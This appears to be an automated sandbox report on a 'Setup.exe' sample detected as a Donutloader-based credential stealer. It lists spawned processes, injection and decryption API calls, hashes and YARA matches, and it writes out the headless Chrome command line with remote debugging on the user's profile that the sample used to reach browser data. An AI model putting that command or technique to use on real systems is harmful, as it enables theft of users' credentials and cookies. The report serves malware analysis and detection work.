ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e Data Ascii: ction(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.n
2024-12-27 20:20:37 UTC	1390	IN	Data Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a\|\|_.la});ma("S

Target ID:	0
Start time:	15:20:02
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Setup.exe"
Imagebase:	0x400000
File size:	76'542'479 bytes
MD5 hash:	F18FA7132A5EDA29041FDD8AE85363DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1878083732.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2277405706.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:20:24
Start date:	27/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:20:25
Start date:	27/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,16733493864301612391,3478327303608930267,262144 --disable-features=PaintHolding /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	15:20:27
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 2328
Imagebase:	0x900000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:20:57
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 2324
Imagebase:	0x900000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	27.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	96

Executed Functions

Function 02DF1927 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 02DF19C0
NtMapViewOfSection.NTDLL(?,00000000), ref: 02DF1A68
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02DF1DDC
NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02DF1E91
VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 02DF1EAE
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02DF1F51
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02DF1F84
CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 02DF20F5

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$ProtectSection$CreateView$AllocThread
String ID:
API String ID: 1248616170-0
Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction ID: 4afe978af2f3dab5bcf1dfe14c0b96459eec72f45fcfaa2a5a6f0c1e071952fa
Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
Instruction Fuzzy Hash: B2427872608301AFDB64CF14C844B6ABBE9EF88714F06492DFA899B351E770ED44CB59

Function 031D5280 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 181
memoryfilenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

NtCreateFile.NTDLL ref: 031D5433
GetProcessHeap.KERNEL32 ref: 031D5459
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 031D5463
NtReadFile.NTDLL ref: 031D5493

Strings

\??\, xrefs: 031D52CE
@, xrefs: 031D532A

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: FileHeap$AllocateByteCharConcurrency::cancel_current_taskCreateMultiProcessReadWide
String ID: @$\??\
API String ID: 1712409946-506726239
Opcode ID: 0bb0b937149fd7306022f5b19d94c86e19212a00f8f927c7c02d229e9c0481ef
Instruction ID: 347442ba6be55d192e88a3fb8561d3c1277e6b6c5cfd9fd890c38008f3d53d08
Opcode Fuzzy Hash: 0bb0b937149fd7306022f5b19d94c86e19212a00f8f927c7c02d229e9c0481ef
Instruction Fuzzy Hash: 3F717974D00358EFDB10EFA8C949BDEBFB8EF4A704F204159E405AB281EB755A45CBA1

Function 031CA5A0 Relevance: 9.7, APIs: 2, Strings: 3, Instructions: 924
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

GetNativeSystemInfo.KERNEL32(?,03226C58,00000003,00000000), ref: 031CA80D

Part of subcall function 031C9F30: NtQuerySystemInformation.NTDLL(?,?,?,?,?,?,?,?,?,?,?,03226BE8,00000002), ref: 031CA08C

Sleep.KERNEL32(00000BB8,?,00000000,?,?,03226C9C,00000003,?,?,?,?,?,?,?,?,00000004), ref: 031CB395

Strings

barni, xrefs: 031CB048
1735337256, xrefs: 031CAF35, 031CAF41
D, xrefs: 031CB422

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: System$ByteCharConcurrency::cancel_current_taskInfoInformationMultiNativeQuerySleepWide
String ID: 1735337256$D$barni
API String ID: 3676425750-3258348729
Opcode ID: 124aee5ae6e0b315c8a5a66b9a89eb67bc50d21d6d9db3639cde71f4546c6b03
Instruction ID: d9186fe0d6bc71d8d3aa53fc1c3d25b21d48db0f3eace18ee41a8b3182450074
Opcode Fuzzy Hash: 124aee5ae6e0b315c8a5a66b9a89eb67bc50d21d6d9db3639cde71f4546c6b03
Instruction Fuzzy Hash: 2FA29A74C0539CDBDB11EB68C9447DDBBB0AF59304F2482C9E4487B282DBB45B89CB92

Function 031ABA40 Relevance: 9.4, APIs: 6, Instructions: 369
memorystringencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,?,?), ref: 031ABC9B
GetProcessHeap.KERNEL32 ref: 031ABCDD
RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 031ABCE7
GetProcessHeap.KERNEL32(00000000,?), ref: 031ABD30
HeapFree.KERNEL32(00000000), ref: 031ABD37
CryptUnprotectData.CRYPT32 ref: 031ABDD0

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Heap$Process$AllocateCryptDataFreeUnprotectlstrlen
String ID:
API String ID: 112277046-0
Opcode ID: 814b7ed27e7eb0b2efbce742cf4973a563800f1ee6b9b7a474ad4cc8a6c41008
Instruction ID: 8ce1fa16e12a22923da03726d71223c90c148b464d346e1d404a3e2b2ec20ebd
Opcode Fuzzy Hash: 814b7ed27e7eb0b2efbce742cf4973a563800f1ee6b9b7a474ad4cc8a6c41008
Instruction Fuzzy Hash: 61F1AB74D04358DFDF14DFA8C944BEEBBB1BF59304F148188E449AB281DB706A89CB92

Function 031A9C20 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 335
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000002), ref: 031AA1DA
CloseHandle.KERNEL32(?), ref: 031AA1EC
CloseHandle.KERNEL32(?), ref: 031AA1F8

Strings

?, xrefs: 031A9E5B
D, xrefs: 031A9FCE

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: ?$D
API String ID: 2922976086-1345265552
Opcode ID: b2cf042de2596c9fc71edd3362c2f7f7b8e2f1669245015ed911f9ea6a82a1c8
Instruction ID: 11fab61ff07727746cb3c0c2a3da04feed1912e28289cda763f058cdb404746a
Opcode Fuzzy Hash: b2cf042de2596c9fc71edd3362c2f7f7b8e2f1669245015ed911f9ea6a82a1c8
Instruction Fuzzy Hash: 8C025871C107A8CADB25CF64CD44BD9BBB0BF5A304F1082DAD4596B291EBB45AC8CF91

Function 031AA250 Relevance: 7.6, APIs: 5, Instructions: 141
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 031AA2E9
RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 031AA32C
RtlReAllocateHeap.NTDLL(?,00000008,00000000,?), ref: 031AA366
GetLastError.KERNEL32 ref: 031AA396
HeapFree.KERNEL32(?,00000000,00000000), ref: 031AA3A6

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Heap$Allocate$ErrorFreeLastProcess
String ID:
API String ID: 1125902347-0
Opcode ID: 4d200f60c5fd28482c6a2d1fba325164984ae932bc8d8e63b750108371548318
Instruction ID: 04c2c8b1d6620de0f1b93f24a884c44a7f62bed83e50f077382f99adf9680c59
Opcode Fuzzy Hash: 4d200f60c5fd28482c6a2d1fba325164984ae932bc8d8e63b750108371548318
Instruction Fuzzy Hash: EC412475A40629AFDB11DFA6DD4CEAFBBB8EF59741F144024FD01E2144DB319944CB60

Function 031B2080 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 605
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32 ref: 031B237C

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

Strings

!, xrefs: 031B29AB

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFileFindFirst
String ID: !
API String ID: 2840147243-2657877971
Opcode ID: 5a7715f6477fab5b12a96475f70d64acf798386eaa55bed937532d19c81cea6d
Instruction ID: dacdd0042e2b8880d87b049fc84823013e5ea77e38c1a7d1cefbd35c5233b20f
Opcode Fuzzy Hash: 5a7715f6477fab5b12a96475f70d64acf798386eaa55bed937532d19c81cea6d
Instruction Fuzzy Hash: 57429B74D0135C9FDB20EB64CC88BEDBBB1AF69304F1442D9D4196B291EBB05B89CB91

Function 02D50A77 Relevance: 6.1, APIs: 4, Instructions: 100
threadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,02D505BD,?,00000001,?,81EC8B55,000000FF), ref: 02D50AB5
Thread32First.KERNEL32(00000000,0000001C), ref: 02D50AE1
Wow64SuspendThread.KERNEL32(00000000), ref: 02D50B34
CloseHandle.KERNEL32(00000000), ref: 02D50B5E

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
String ID:
API String ID: 1849706056-0
Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction ID: be35221c9ecc7999febe3e49a2dfa6f074abc027e081a5885a15f5f2a5cc2a74
Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
Instruction Fuzzy Hash: 48410C71A00118AFDB18DF98C490FAEB7B6EF88304F108168EA159B794DB74AE45CB94

Function 02D50367 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 399
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 02D5060A

Strings

WYVK, xrefs: 02D5044B
sR8, xrefs: 02D503F1

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: WYVK$sR8
API String ID: 2422867632-1046787239
Opcode ID: 71241f842a267370b4fde931541ea62c91b78cacea02c1d1f1d215ef884c2407
Instruction ID: 3d506ccc1cc3d75fa597879d8f85b25557eb7d6b92781f438fc0c1a8bec0d110
Opcode Fuzzy Hash: 71241f842a267370b4fde931541ea62c91b78cacea02c1d1f1d215ef884c2407
Instruction Fuzzy Hash: 8012C2B5E00219DBDB14CF98C990BADBBB1FF88305F2482A9D915AB385C774AA41CF54

Function 031B2A20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

NtQueryAttributesFile.NTDLL ref: 031B2B25

Strings

@, xrefs: 031B2B09
\??\, xrefs: 031B2AAE

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: AttributesByteCharFileMultiQueryWide
String ID: @$\??\
API String ID: 4261815757-506726239
Opcode ID: 990c6d327f96f29864d3cc84e133154efe4c706dcac41d59a0f292869752d9c1
Instruction ID: 63a62b586e1c958ba4415536dd317b0eda4a1f9c1b8c59941ac7b1af34013b97
Opcode Fuzzy Hash: 990c6d327f96f29864d3cc84e133154efe4c706dcac41d59a0f292869752d9c1
Instruction Fuzzy Hash: 473148B5D1035CEBCB10EFA4C944BDEBBF8EF49714F20426AD415AB281EB745A49CB90

Function 031CDEB0 Relevance: 4.7, APIs: 3, Instructions: 188networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

InternetOpenUrlA.WININET ref: 031CE086
InternetReadFile.WININET ref: 031CE0EA
InternetReadFile.WININET ref: 031CE136

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Internet$FileRead$ByteCharConcurrency::cancel_current_taskMultiOpenWide
String ID:
API String ID: 3525159475-0
Opcode ID: e9ba012af959389f83c4ed54c1f3f25f3599245b5aa0e45da192d03f6bcbead6
Instruction ID: 70d836edc02523bbacfb842cfc7cfb6020267c1a564f42b091b95447e51247ce
Opcode Fuzzy Hash: e9ba012af959389f83c4ed54c1f3f25f3599245b5aa0e45da192d03f6bcbead6
Instruction Fuzzy Hash: 88816B70A50268AFDB20DF14CD09BD9BBB4EF08704F104189E545AB295DBB5AE85CF90

Function 02D50927 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 02D509F3

Strings

,, xrefs: 02D50A3F

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ,
API String ID: 2422867632-3772416878
